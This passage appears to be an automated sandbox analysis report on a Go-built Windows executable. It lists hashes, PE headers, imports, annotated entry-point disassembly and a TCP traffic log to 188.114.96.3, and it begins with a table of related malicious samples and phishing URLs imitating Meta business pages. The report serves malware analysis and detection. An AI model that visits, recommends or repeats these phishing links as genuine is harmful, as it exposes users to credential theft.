              http://business.ifbsmetaiidentiityconfirms.com/meta-community-standard100068928266341/ | malicious | HTMLPhisher | 188.114.97.3
              http://services.business-manange.com/ | malicious | HTMLPhisher | 172.67.138.117
              http://pub-2e7429ed1f544f43a4684eeceb978dbb.r2.dev/home.html | malicious | HTMLPhisher | 104.18.2.35
              http://helpdesk-advertising-review-id-9865133.d3m7n55z273utf.amplifyapp.com/index.html | malicious | Unknown | 104.26.8.44
              Match: a0e9f5d64349fb13191bc781f81f42e1
              Associated Sample Name / URL | Detection | Threat Name | Context
              qeUaxJCA3FO.exe | malicious | LummaC | 188.114.96.3
              hANEXOPDF.PDF40 234057.msi | malicious | Unknown | 188.114.96.3
              file.exe | malicious | Amadey, Mars Stealer, Stealc, Vidar | 188.114.96.3
              https://www.support.cryptoplanet.in/downloads.php | malicious | Unknown | 188.114.96.3
              swift_copy.docx.doc | malicious | Unknown | 188.114.96.3
              Vq3Ri8EP9z.exe | malicious | LummaC | 188.114.96.3
              SecuriteInfo.com.Win64.Malware-gen.24311.29797.exe | malicious | LummaC | 188.114.96.3
              SecuriteInfo.com.Win64.Malware-gen.20485.10039.exe | malicious | LummaC | 188.114.96.3
              file.exe | malicious | Clipboard Hijacker, PureLog Stealer, RisePro Stealer | 188.114.96.3
              BDQfYL99b2.exe | malicious | Remcos | 188.114.96.3
              No context
              No created / dropped files found
File type: PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit): 6.437009110478457
TrID:
• Win64 Executable (generic) (12005/4) 74.95%
• Generic Win/DOS Executable (2004/3) 12.51%
• DOS Executable Generic (2002/1) 12.50%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name: 6xmBUtHylU.exe
File size: 6'814'720 bytes
MD5: b82c80a3ce9b5c44391d3f11307f8b8e
SHA1: 7480059bc051383eaaf0d83b7f39d7c4989e4dea
SHA256: ce9b5ec3693188ed91e363e55286cd212f44912b042bd83a924af2f43daaa55f
SHA512: c04bb5a116dfbe2599ce91e084888d5c051e831812ed75e7d0fd40373f0f0ade7701246a433cf5552b5b8b370155b95547f8165d7d38c76325124c7afbf431e2
SSDEEP: 49152:8im7Z/AvmNVNL6B6QeuuLlKHqhk/6eYivn7Bp+CiOo0NGpkAF3j+5E3BN7ObFb+I:/fe3F8+eYYn1liONE3B2AK8i
TLSH: BE664907E99C45EAC3AB923185628252BA717C4C7B212FD33A94F73C2E72BD05E75784
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$.p'...g................@.............................Pq.......h...`... ............................
Icon Hash: 0f3371686865330f
Entrypoint: 0x1400014c0
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x140000000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC] (a zeroed link timestamp is the norm for PE files produced by the Go toolchain, which this binary's _cgo_dummy_export export and embedded go-winio module string indicate; on its own it is not evidence of post-build tampering)
TLS Callbacks: 0x14026c940, 0x14026c910, 0x1402703b0 (three 64-bit callback pointers, all inside .text; the raw tool output "0x4026c940, 0x1, 0x4026c910, 0x1, 0x402703b0, 0x1" is the same array read as 32-bit halves, the interleaved 0x1 values being the upper dword of each pointer)
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 1
File Version Major: 6
File Version Minor: 1
Subsystem Version Major: 6
Subsystem Version Minor: 1
Import Hash: c595f1660e1a3c84f4d9b0761d23cd7a
Instruction (entry point 0x1400014c0, sandbox listing decoded as 32-bit code)
Reading note: the bytes are 64-bit code but were decoded in 32-bit mode, so every `dec eax` that precedes `sub esp, 28h`, `mov eax, dword ptr [...]` or `add esp, 28h` is really the 0x48 REX.W prefix of `sub rsp, 28h`, `mov rax, qword ptr [rip+disp32]` and `add rsp, 28h`. The first two functions load the address of a CRT flag, store 1 (at the entry point) or 0, and call the CRT startup routine, which is the shape of the MinGW-w64 WinMainCRTStartup/mainCRTStartup stubs expected for a cgo build (compare the msvcrt.dll imports and the _cgo_dummy_export export listed further down). From `jmp dword ptr [eax]` onward the listing is data, not code: the bytes spell the Go build-ID marker (`\xff Go build ID: "..."`) that the Go linker emits at the start of its text, which is why the disassembly degenerates into `outsd`, `imul` with ASCII immediates and `push` of ASCII constants. Nothing after the `ret` at the end of the fourth stub should be read as executable logic.
              dec eax
              sub esp, 28h
              dec eax
              mov eax, dword ptr [00618B95h]
              mov dword ptr [eax], 00000001h
              call 00007F4A045F506Fh
              nop
              nop
              dec eax
              add esp, 28h
              ret
              nop dword ptr [eax]
              dec eax
              sub esp, 28h
              dec eax
              mov eax, dword ptr [00618B75h]
              mov dword ptr [eax], 00000000h
              call 00007F4A045F504Fh
              nop
              nop
              dec eax
              add esp, 28h
              ret
              nop dword ptr [eax]
              dec eax
              sub esp, 28h
              call 00007F4A0486B5CCh
              dec eax
              test eax, eax
              sete al
              movzx eax, al
              neg eax
              dec eax
              add esp, 28h
              ret
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              dec eax
              lea ecx, dword ptr [00000009h]
              jmp 00007F4A045F5389h
              nop dword ptr [eax+00h]
              ret
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              jmp dword ptr [eax]
              inc edi
              outsd
              and byte ptr [edx+75h], ah
              imul ebp, dword ptr [esp+20h], 203A4449h
              and bl, byte ptr [edx+4Ch]
              push edx
              inc edi
              dec eax
              imul ecx, dword ptr [edx+30h], 644C594Fh
              push 00000047h
              dec esi
              push 2F6A5666h
              inc esi
              jc 00007F4A045F5403h
              inc edx
              dec ebx
              dec eax
              outsd
              dec esp
              xor eax, 7A754763h
              push esi
              push ecx
              jo 00007F4A045F540Bh
              dec esp
              xor eax, 44392F79h
              popad
              outsd
              dec ebp
              inc esp
              outsb
              js 00007F4A045F5416h
              push 52735338h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x6ba000 | 0x4e | .edata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6bb000 | 0x1458 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6bf000 | 0x46654 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x61b000 | 0xeb14 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x706000 | 0xe06c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x6199c0 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x6bb494 | 0x458 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy
.text | 0x1000 | 0x276ee0 | 0x277000 | 21328c5de759c0a70434f2e4bf5baab3 | unknown | unknown | unknown | unknown
  Characteristics: IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x278000 | 0x58f30 | 0x59000 | a5c934d1e605016ca9bc9e34c2572463 | False | 0.30690122454353935 | dBase III DBT, version number 0, next free block index 10, 1st item "soft/go-winio\011v0.6.2\011h1:F2VQgta7ecxGYO8k3ZZz3RS8fVIXVxONVUPlNERoyfY=" | 4.847467174274334
  Characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
  Note: the "dBase III DBT" file type is a libmagic misidentification; the quoted bytes are the Go module list embedded in the binary (Microsoft/go-winio v0.6.2 with its go.sum "h1:" hash), another marker of a Go build.
.rdata | 0x2d1000 | 0x3497f0 | 0x349800 | 8f76f8e497ad9511624c7612678654c7 | unknown | unknown | unknown | unknown
  Characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.pdata | 0x61b000 | 0xeb14 | 0xec00 | 1c047672cc8864685f7e5360cd89867e | False | 0.4103548728813559 | data | 5.5899386037201815
  Characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.xdata | 0x62a000 | 0xc50 | 0xe00 | 8508355d6440a3304e32acf5da5b3b2b | False | 0.25809151785714285 | data | 3.991763933880241
  Characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.bss | 0x62b000 | 0x8f000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0
  Characteristics: IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata | 0x6ba000 | 0x4e | 0x200 | eca7ca2477ab9129d5e54a0760db31a9 | False | 0.130859375 | data | 0.8387805141107897
  Characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.idata | 0x6bb000 | 0x1458 | 0x1600 | b99b46cf2c4cc37c3dbf4aa138ce03fc | False | 0.29829545454545453 | data | 4.3423408018444025
  Characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT | 0x6bd000 | 0x70 | 0x200 | 01fc1744f2f71b31ee52667346735f67 | False | 0.0859375 | data | 0.4692395374032078
  Characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x6be000 | 0x10 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0
  Characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x6bf000 | 0x46654 | 0x46800 | 0ec7e9d5ee951e7482e14aa00bdc7083 | False | 0.043796404033687945 | data | 2.6688583948899858
  Characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x706000 | 0xe06c | 0xe200 | 23255e5e76b09febdd2b719c1ad385f2 | False | 0.25114076327433627 | data | 5.434881914627796
  Characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x6bf1cc | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.32978723404255317
RT_ICON | 0x6bf634 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.19699812382739212
RT_ICON | 0x6c06dc | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.17448132780082987
RT_ICON | 0x6c2c84 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 0 | | | 0.031367429061751044
RT_GROUP_ICON | 0x704cac | 0x3e | data | | | 0.7903225806451613
RT_VERSION | 0x704cec | 0x308 | data | English | United States | 0.43041237113402064
RT_MANIFEST | 0x704ff4 | 0x660 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.39767156862745096
DLL | Import
KERNEL32.dll | AddAtomA, AddVectoredContinueHandler, AddVectoredExceptionHandler, CloseHandle, CreateEventA, CreateFileA, CreateIoCompletionPort, CreateMutexA, CreateSemaphoreA, CreateThread, CreateWaitableTimerExW, DeleteAtom, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, ExitProcess, FindAtomA, FormatMessageA, FreeEnvironmentStringsW, GetAtomNameA, GetConsoleMode, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetEnvironmentStringsW, GetErrorMode, GetHandleInformation, GetLastError, GetProcAddress, GetProcessAffinityMask, GetQueuedCompletionStatusEx, GetStartupInfoA, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTimeAsFileTime, GetThreadContext, GetThreadPriority, GetTickCount, InitializeCriticalSection, IsDBCSLeadByteEx, IsDebuggerPresent, LeaveCriticalSection, LoadLibraryExW, LoadLibraryW, LocalFree, MultiByteToWideChar, OpenProcess, OutputDebugStringA, PostQueuedCompletionStatus, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseException, RaiseFailFastException, ReleaseMutex, ReleaseSemaphore, RemoveVectoredExceptionHandler, ResetEvent, ResumeThread, RtlLookupFunctionEntry, RtlVirtualUnwind, SetConsoleCtrlHandler, SetErrorMode, SetEvent, SetLastError, SetProcessAffinityMask, SetProcessPriorityBoost, SetThreadContext, SetThreadPriority, SetUnhandledExceptionFilter, SetWaitableTimer, Sleep, SuspendThread, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TryEnterCriticalSection, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WerGetFlags, WerSetFlags, WideCharToMultiByte, WriteConsoleW, WriteFile, __C_specific_handler
msvcrt.dll | ___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _beginthread, _beginthreadex, _cexit, _commode, _endthreadex, _errno, _fmode, _initterm, _lock, _memccpy, _onexit, _setjmp, _strdup, _ultoa, _unlock, abort, calloc, exit, fprintf, fputc, free, fwrite, localeconv, longjmp, malloc, memcpy, memmove, memset, printf, realloc, signal, strerror, strlen, strncmp, vfprintf, wcslen
Name | Ordinal | Address
_cgo_dummy_export | 1 | 0x1406b9230
(This single export is emitted by Go's runtime/cgo on Windows and, together with the msvcrt.dll CRT imports and the .CRT/.xdata/.pdata sections of a MinGW-w64 link, identifies the sample as a Go binary built with cgo. The static import table therefore reflects the Go runtime, not the stealer's behaviour; the injection and credential-theft capabilities flagged in the signatures are resolved at run time.)
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 5, 2024 06:03:09.722399950 CEST | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:09.722450018 CEST | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:09.722527981 CEST | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:09.725661039 CEST | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:09.725681067 CEST | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:10.212552071 CEST | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:10.212654114 CEST | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:10.215186119 CEST | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:10.215197086 CEST | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:10.215440989 CEST | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:10.263241053 CEST | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:10.263267994 CEST | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:10.263340950 CEST | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:10.641165018 CEST | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:10.641261101 CEST | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:10.641314030 CEST | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:10.642874002 CEST | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:10.642884970 CEST | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:10.642899990 CEST | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:10.642905951 CEST | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:10.661523104 CEST | 49712 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:10.661570072 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:10.661637068 CEST | 49712 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:10.663453102 CEST | 49712 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:10.663475990 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:11.137254953 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:11.137417078 CEST | 49712 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:11.139765024 CEST | 49712 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:11.139770985 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:11.140096903 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:11.141432047 CEST | 49712 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:11.141484022 CEST | 49712 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:11.141505003 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:11.537487984 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:11.537530899 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:11.537590027 CEST | 49712 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:11.537596941 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:11.537605047 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:11.537642956 CEST | 49712 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:11.537647009 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:11.537949085 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:11.538005114 CEST | 49712 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:11.538011074 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:11.538202047 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:11.538228989 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:11.538250923 CEST | 49712 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:11.538259029 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:11.538300991 CEST | 49712 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:11.542226076 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:11.542287111 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:11.542330980 CEST | 49712 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:11.542342901 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:11.591516972 CEST | 49712 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:11.627453089 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:11.627504110 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:11.627540112 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:11.627564907 CEST | 49712 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:11.627578020 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:11.627610922 CEST | 49712 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:11.627615929 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:11.627672911 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:11.627722979 CEST | 49712 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:11.627849102 CEST | 49712 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:11.627866983 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:11.627880096 CEST | 49712 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:11.627885103 CEST | 443 | 49712 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:11.761686087 CEST | 49713 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:11.761718035 CEST | 443 | 49713 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:11.761791945 CEST | 49713 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:11.762186050 CEST | 49713 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:11.762202978 CEST | 443 | 49713 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:12.264345884 CEST | 443 | 49713 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:12.264552116 CEST | 49713 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:12.265976906 CEST | 49713 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:12.265985012 CEST | 443 | 49713 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:12.266217947 CEST | 443 | 49713 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:12.268119097 CEST | 49713 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:12.268270969 CEST | 49713 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:12.268306017 CEST | 443 | 49713 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:12.715369940 CEST | 443 | 49713 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:12.715485096 CEST | 443 | 49713 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:12.715565920 CEST | 49713 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:12.715796947 CEST | 49713 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:12.715817928 CEST | 443 | 49713 | 188.114.96.3 | 192.168.2.6
Jul 5, 2024 06:03:12.827904940 CEST | 49714 | 443 | 192.168.2.6 | 188.114.96.3
Jul 5, 2024 06:03:12.827936888 CEST | 443 | 49714 | 188.114.96.3 | 192.168.2.6
